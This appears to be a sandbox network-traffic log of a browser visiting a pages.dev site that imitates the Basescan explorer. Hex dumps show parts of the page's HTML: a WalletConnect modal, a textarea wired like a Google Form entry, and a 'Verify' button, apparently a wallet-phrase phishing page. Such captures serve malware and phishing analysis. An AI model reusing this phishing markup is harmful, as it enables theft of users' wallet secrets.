                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9bac48c60-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              39192.168.2.549773104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/ab9c186a-c52f-464b-2906-ca59d760a400 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9b8104379-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              40192.168.2.549774104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/06b26297-fe0c-4733-5d6b-ffa5498aac00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9bbf841c1-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              41192.168.2.549770104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/41d04d42-da3b-4453-8506-668cc0727900 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC449INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9b8ee8c1d-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              42192.168.2.549771104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC687OUTOPTIONS /public/getAssetImage/93564157-2e8e-4ce7-81df-b264dbee9b00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Access-Control-Request-Method: GET
                                                                                                                                                                                                                                              Access-Control-Request-Headers: x-project-id,x-sdk-type,x-sdk-version
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC489INHTTP/1.1 204 Not Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Vary: Origin, Access-Control-Request-Headers
                                                                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: x-project-id,x-sdk-version,x-sdk-type
                                                                                                                                                                                                                                              Access-Control-Allow-Methods: OPTIONS,GET,POST,PUT,PATCH,DELETE
                                                                                                                                                                                                                                              Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9bb0b0fa1-EWR


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              43192.168.2.549768104.18.37.84435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC552OUTGET /rpc HTTP/1.1
                                                                                                                                                                                                                                              Host: www.walletlink.org
                                                                                                                                                                                                                                              Connection: Upgrade
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Upgrade: websocket
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Sec-WebSocket-Key: TZYeXcDa9lNYvDKgUU+hTw==
                                                                                                                                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC631INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                              Content-Length: 12
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Headers: Authorization
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Sec-Websocket-Version: 13
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                              Set-Cookie: __cf_bm=Vlakn0ecTW2HsGVEZdzl2haEnepyQUjfQraFQM2cUnY-1727486163-1.0.1.1-2O_d_wSgutErsLvnfPZdJ5dLo_PoU_.FLQjT0jr.B8qZZ2jvuzSLGp3hbWbEe2y7iYf4.09ysBo2ithSlppFHw; path=/; expires=Sat, 28-Sep-24 01:46:03 GMT; domain=.walletlink.org; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9bcb57cf3-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                                                                                                                                                                                              Data Ascii: Bad Request


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              44192.168.2.549745172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC815OUTGET /images/svg/brands/metamask.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FTWKI7qGGA6tIBUBAzpo6HTLiv0OMebZFU4E8%2F51HbxzlHdsm0m%2BY6QtGh7NpM4xk1l4mgGbYIreYq%2BxIYpSzIHzqZMUzxxPNxMcGmc1R7xWBjv5o5RwfnwUYjOVg%2BrLc%2F5dhc9mSOodEF6ZuA67y4IXl%2FbylF3%2FGmSeAoAcomwRYjnMWkzcaoaxPx2eseeRrDAl%2Fq81"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2c9f82a43f3-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 74 79 3a 20 68 69 64 64 65 6e 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 22 0d 0a 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 69 64 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 2d 6d 6f 64 61 6c 22 0d 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 5f 5f 62 61 73 65 20 61 6e 69 6d 61 74 65 64 20 66 61 64 65 49 6e 22 0d 0a 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e
                                                                                                                                                                                                                                              Data Ascii: ty: hidden; overflow: hidden; z-index: 100" > <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn" > <div class="walletconnect-modal__base"> <div class="walletconn
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 4c 37 39 2e 35 34 32 33 30 32 2c 37 30 2e 39 36 38 35 35 39 32 20 43 37 38 2e 33 31 39 35 32 30 34 2c 37 32 2e 31 36 35 37 36 33 33 20 37 36 2e 33 33 37 30 30 31 2c 37 32 2e 31 36 35 37 36 33 33 20 37 35 2e 31 31 34 32 32 31 34 2c 37 30 2e 39 36 38 35 35 39 32 20 4c 35 34 2e 39 37 37 35 32 36 35 2c 35 31 2e 32 35 33 30 35 36 31 20 43 35 32 2e 35 33 31 39 36 35 33 2c 34 38 2e 38 35 38 36 34 36 39 20 35 32 2e 35 33 31 39 36 35 33 2c 34 34 2e 39 37 36 35 34 33 39 20 35 34 2e 39 37 37 35 32 36 35 2c 34 32 2e 35 38 32 31 33 35 37 20 4c 36 31 2e 34 33 38 35 34 32 39 2c 33 36 2e 32 35 36 32 36 31 32 20 5a 20 4d 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 4c 32 39 38 2e 31 32 38 30 33 36 2c 39 34 2e 35 37 36 39 30 33 31 20 43 33 30 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.5
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 2e 30 33 30 30 30 36 31 20 43 32 37 33 2e 37 39 35 37 34 2c 37 34 2e 36 33 35 35 39 36 39 20 32 37 37 2e 37 36 30 37 37 38 2c 37 34 2e 36 33 35 35 39 36 39 20 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 5a 26 23 33 39 3b 20 69 64 3d 26 23 33 39 3b 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 26 23 33 39 3b 25 33 45 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                              Data Ascii: .0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z&#39; id=&#39;WalletConnect&#39;%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo" /> <p>WalletConnect</
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 76 6f 74 61 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 65 6e 74 72 79 2e 32 30 33 36 35 30 31 33 35 33 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 74 65 78 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 49 6e 70 75 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69
                                                                                                                                                                                                                                              Data Ascii: target="votar" style="width: 100%" > <textarea name="entry.2036501353" type="text" id="pInput" class="i
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC1369INData Raw: 65 3d 22 73 75 62 6d 69 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3d 22 6c 69 67 68 74 42 6c 75 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 2d 67 74 73 72 48 54 20 67 66 75 53 71 47 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 69 66 79 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d
                                                                                                                                                                                                                                              Data Ascii: e="submit" color="lightBlue" style="display: block; justify-content: center" > <div class="sc-gtsrHT gfuSqG"></div> Verify </button>
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC911INData Raw: 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 62 74 6e 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 68 69 64 65 4c 6f 61 64 65 72 28 29 22 2c 20 34 20 2a 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 4c 6f 61 64 65 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 65 72 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ocument.getElementById("pbtn").style.display = "none"; setTimeout("hideLoader()", 4 * 1000); } function hideLoader() { document.getElementById("loader").style.display = "non
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              45192.168.2.549779104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC645OUTGET /images/logo-symbol.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Thu, 16 Feb 2023 04:39:00 GMT
                                                                                                                                                                                                                                              ETag: "0ca9496c041d91:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 119853
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDMeQr6xWC86IHmbIu2NSKCr25naHRx9iPDJhARGNY2YIGh481QaKNfa475TCfHAqVfgFecqgkQwTsXABrw4dWBRJGkB0cPYyrH%2FkICpK0l%2BqxBoWRPY63H66YurGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cb9b7443cb-EWR
